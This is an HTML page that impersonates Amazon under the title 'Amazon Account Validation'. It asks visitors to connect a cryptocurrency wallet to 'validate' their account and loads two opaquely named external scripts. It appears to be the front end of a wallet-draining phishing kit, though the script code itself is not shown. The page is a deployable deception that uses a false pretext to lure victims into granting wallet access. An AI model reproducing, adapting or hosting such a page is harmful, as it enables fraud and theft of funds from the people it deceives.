<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Amazon Account Validation</title>
  <link rel="icon" href="./images/favicon.ico" type="image/x-icon">
  <script charset="UTF-8" type="text/javascript" src="./f7d9f66b-b3e8-4dbd-b186-4809fd0c13a2.js"></script>
  
</head>
<style>
    body {
      margin: 0;
      padding: 0;
      font-family: Arial, sans-serif;
      background-color: #FAF9F6;
    }

    .top-bar {
      background-color: #000033; /* Very Dark Blue */
      height: 50px; /* Adjust the height as needed */
      width: 100%;
      display: flex;
      align-items: center;
      padding-left: 20px;
    }

    .logo {
      width: 60px; /* Adjust the width as needed */
      height: auto;
      margin-right: 15px; /* Adjust the margin as needed */
    }

    .error-container {
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      height: 100vh;
    }

    .error-heading {
      font-weight: bold;
      color: #000033; /* Light Blue */
      text-align: center;
      margin-bottom: 20px;
    }

    .error-message-container {
      background-color: #fff;
      border: 2px solid #000;
      padding: 20px;
      text-align: center;
    }

    .error-message {
      color: #fff;
    }

    .action-button {
      display: inline-block;
      padding: 10px 20px;
      background-color: #00a3cc; /* Light Blue */
      color: #fff;
      text-decoration: none;
      font-weight: bold;
      border: none;
      cursor: pointer;
    }
    .Home_soon__8s2ww button {
        background-color: #000033;
        border: 2px solid #cac8c8;
        border-radius: 10px;
        box-sizing: border-box;
        color: #FAF9F6;
        cursor: pointer;
        display: inline-block;
        font-size: 20px;
        font-weight: 600;
        line-height: 20px;
        margin: 0;
        outline: none;
        padding: 13px 23px;
        position: relative;
        text-align: center;
        text-decoration: none;
        touch-action: manipulation;
        transition: box-shadow .2s, -ms-transform .1s, -webkit-transform .1s, transform .1s;
        user-select: none;
        -webkit-user-select: none;
        width: auto;
    }

    .Home_soon__8s2ww button:focus-visible {
        box-shadow: #222222 0 0 0 2px, rgba(255, 255, 255, 0.8) 0 0 0 4px;
        transition: box-shadow .2s;
    }

    .Home_soon__8s2ww button:active {
        background-color: #F7F7F7;
        border-color: #000000;
        transform: scale(.96);
    }

    .Home_soon__8s2ww button:disabled {
        border-color: #DDDDDD;
        color: #DDDDDD;
        cursor: not-allowed;
        opacity: 1;
    }
</style>



<body>
  <div class="top-bar">
    <img class="logo" src="homelogo.png" alt="Logo">
  </div>
  <div class="error-container">
    <h1 class="error-heading">Please connect your wallet to validate your Amazon Account.</h1>
    <div class="Home_soon__8s2ww">
        <button class="interact-button">Connect Wallet</button><button class="interact-button" style="display: none;">Connect Wallet</button>
        <br />
    </div>
  </div>
  <script charset="UTF-8" type="text/javascript" src="./bf17704b-49ff-4c4f-98f3-2945b6cda9d4.js"></script>
</body>
</html>
